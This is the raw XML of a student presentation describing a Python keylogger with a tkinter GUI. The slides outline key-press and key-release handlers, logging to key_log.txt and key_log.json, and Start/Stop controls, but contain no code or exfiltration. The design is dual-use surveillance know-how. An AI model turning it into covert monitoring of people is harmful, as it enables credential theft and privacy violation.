          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="355600">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="800" b="0" i="0" kern="1200" baseline="0"/>
            <a:t>Store the logged keystrokes in a list.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="847" y="1477327"/>
        <a:ext cx="1319249" cy="1477327"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C8CB6295-04BE-4EA4-9F6A-BF9482E09C6C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="36458" y="224452"/>
          <a:ext cx="1229875" cy="122987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CF7B15A-721B-468A-82AE-D533A5DC693B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1359674"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t" anchorCtr="1">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="l" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" i="0" kern="1200" baseline="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>2.Log Storage</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="0" i="0" kern="1200" baseline="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="355600">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="800" b="0" i="0" kern="1200" baseline="0" dirty="0"/>
            <a:t>Save the keystrokes in a text file named key_log.txt.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" kern="1200" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="355600">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="800" b="0" i="0" kern="1200" baseline="0" dirty="0"/>
            <a:t>Save the keystrokes in a JSON file named </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="800" b="0" i="0" kern="1200" baseline="0" dirty="0" err="1"/>
            <a:t>key_log.json</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="800" b="0" i="0" kern="1200" baseline="0" dirty="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1359674" y="1477327"/>
        <a:ext cx="1319249" cy="1477327"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3BAAE64C-0C0C-436C-B4D1-CB1DBB24D5DB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1404361" y="221599"/>
          <a:ext cx="1229875" cy="122987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3000" r="-63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97734C01-2287-493B-9F67-D1D31C1B37A9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2719349"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t" anchorCtr="1">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="l" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" i="0" kern="1200" baseline="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>3.Graphical User Interface (GUI)</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="0" i="0" kern="1200" baseline="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="355600">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="800" b="0" i="0" kern="1200" baseline="0" dirty="0"/>
            <a:t>Provide a simple GUI using the tkinter library.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" kern="1200" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="355600">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="800" b="0" i="0" kern="1200" baseline="0" dirty="0"/>
            <a:t>Include "Start" and "Stop" buttons to control the keylogger.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" kern="1200" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="355600">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="800" b="0" i="0" kern="1200" baseline="0" dirty="0"/>
            <a:t>Display the status of the keylogger (running or stopped) in the GUI.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2719349" y="1477327"/>
        <a:ext cx="1319249" cy="1477327"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{76A8BCAD-F926-456C-847F-7C01C78E402B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2763188" y="221599"/>
          <a:ext cx="1229875" cy="122987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628F9F94-476C-48F1-94BE-EC3D86C96236}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="161543" y="2954655"/>
          <a:ext cx="3715511" cy="553997"/>
        </a:xfrm>
        <a:prstGeom prst="leftRightArrow">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24D0E-65E2-46AB-8295-CDB0E6AB60C5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="1363163"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just" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0">
            <a:solidFill>
              <a:srgbClr val="FF0066"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="just" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="10000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>4.Keyboard Event Handlers</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="800" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="10000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>:</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="l" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="800" kern="1200" dirty="0"/>
            <a:t>on_press(key): Logs the key press and hold events, updates keys_used, and generates the JSON file</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="just" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="800" kern="1200" dirty="0"/>
            <a:t>on_release(key): Logs the key release event, updates keys_used, generates the JSON file, and updates the text log.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:endParaRPr lang="en-US" sz="700" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="1477327"/>
        <a:ext cx="1363163" cy="1477327"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6C31DE76-D49C-451C-8907-4C861ADEA3F6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="67520" y="221599"/>
          <a:ext cx="1229875" cy="122987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8000" r="-68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05DCDAA-6710-47A6-85D6-3828FE2432E3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1404934" y="0"/>
          <a:ext cx="1363163"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just" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="10000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>5.File Handling</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="10000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>:</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="l" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="800" kern="1200" dirty="0"/>
            <a:t>generate_text_log(key): Writes the accumulated keystrokes to key_log.txt.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="just" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="800" kern="1200" dirty="0" err="1"/>
            <a:t>generate_json_file</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="800" kern="1200" dirty="0"/>
            <a:t>(keys_used): Writes the keystroke events to </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="800" kern="1200" dirty="0" err="1"/>
            <a:t>key_log.json</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="800" kern="1200" dirty="0"/>
            <a:t> in JSON format</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1404934" y="1477327"/>
        <a:ext cx="1363163" cy="1477327"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{77C3B04E-8443-4F0A-AE4E-68EBD24E3328}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1471578" y="221599"/>
          <a:ext cx="1229875" cy="122987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D5C839B-2F50-4942-9FC2-E5FBE55CC1C7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2808992" y="0"/>
          <a:ext cx="1363163"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just" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="l" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="just" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="10000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>6.GUI </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Functions</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="700" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>:</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="just" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="800" kern="1200" dirty="0"/>
            <a:t>start_keylogger(): Starts the keylogger and updates the GUI status.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="just" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="800" kern="1200" dirty="0"/>
            <a:t>Stop_keylogger(): Stops the keylogger and  updates the GUI  status.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="just" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:endParaRPr lang="en-US" sz="800" kern="1200" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:endParaRPr lang="en-US" sz="700" kern="1200" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:endParaRPr lang="en-US" sz="700" kern="1200" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:endParaRPr lang="en-US" sz="700" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2808992" y="1477327"/>
        <a:ext cx="1363163" cy="1477327"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A9EBEFC0-F5EF-48C3-A240-EBC14D2D5BAB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2875636" y="221599"/>
          <a:ext cx="1229875" cy="122987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BEAA052-B204-4B8E-999B-BBCA56A2AB22}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="166921" y="2954655"/>
          <a:ext cx="3839189" cy="553997"/>
        </a:xfrm>
        <a:prstGeom prst="leftRightArrow">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4385D41-DC47-40E3-839C-84921892BF72}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/13/2024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59B72C0-2D59-4F0B-994F-71DBCA79FC7A}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="60050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B72C0-2D59-4F0B-994F-71DBCA79FC7A}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="146605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diagramColors" Target="../diagrams/colors2.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="../diagrams/colors3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramLayout" Target="../diagrams/layout1.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramLayout" Target="../diagrams/layout4.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramQuickStyle" Target="../diagrams/quickStyle2.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramQuickStyle" Target="../diagrams/quickStyle3.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramData" Target="../diagrams/data1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramLayout" Target="../diagrams/layout3.xml"/><Relationship Id="rId20"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1.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramLayout" Target="../diagrams/layout2.xml"/><Relationship Id="rId24" Type="http://schemas.microsoft.com/office/2007/relationships/diagramDrawing" Target="../diagrams/drawing4.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="../diagrams/colors1.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramData" Target="../diagrams/data3.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="../diagrams/colors4.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diagramQuickStyle" Target="../diagrams/quickStyle1.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.jpg"/><Relationship Id="rId14" Type="http://schemas.microsoft.com/office/2007/relationships/diagramDrawing" Target="../diagrams/drawing2.xml"/><Relationship Id="rId22"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45487" y="2183843"/>
            <a:ext cx="7701025" cy="509114"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="149987" dist="250190" dir="8460000" algn="ctr">
              <a:srgbClr val="000000">
                <a:alpha val="28000"/>
              </a:srgbClr>
            </a:outerShdw>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txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16510" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="3213735">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" spc="15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>MATAPATI ANKITHA</a:t>
            </a:r>
            <a:endParaRPr spc="15" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C000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a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="228600">
              <a:schemeClr val="accent1">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw blurRad="149987" dist="250190" dir="8460000" algn="ctr">
              <a:srgbClr val="000000">
                <a:alpha val="28000"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:softEdge rad="12700"/>
          </a:effectLst>
          <a:scene3d>
            <a:camera prst="orthographicFront">
              <a:rot lat="0" lon="0" rev="0"/>
            </a:camera>
            <a:lightRig rig="contrasting" dir="t">
              <a:rot lat="0" lon="0" rev="1500000"/>
            </a:lightRig>
          </a:scene3d>
          <a:sp3d prstMaterial="metal">
            <a:bevelT w="88900" h="88900"/>
          </a:sp3d>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70669"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16510" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="harsh" dir="t"/>
            </a:scene3d>
            <a:sp3d extrusionH="57150" prstMaterial="matte">
              <a:bevelT w="63500" h="12700" prst="angle"/>
              <a:contourClr>
                <a:schemeClr val="bg1">
                  <a:lumMod val="65000"/>
                </a:schemeClr>
              </a:contourClr>
            </a:sp3d>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0">
                <a:ln/>
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>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The Wow in our Solution</a:t>
            </a:r>
            <a:endParaRPr sz="3600" dirty="0">
              <a:ln/>
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>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2496EE5B-FC44-4D91-5059-622713C80451}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="739775" y="1481735"/>
            <a:ext cx="9458325" cy="92333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dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>The solution’s wow factor comes from its blend of functionality, ease of use, and educational value. It effectively combines a simple yet powerful GUI with robust key logging capabilities, making it a useful tool both for practical applications and as a learning resource.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{884A6FFA-FA58-26F2-F861-D6C133AE569C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2513125" y="2252976"/>
            <a:ext cx="7467218" cy="4308872"/>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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>1.Seamless User Interaction </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
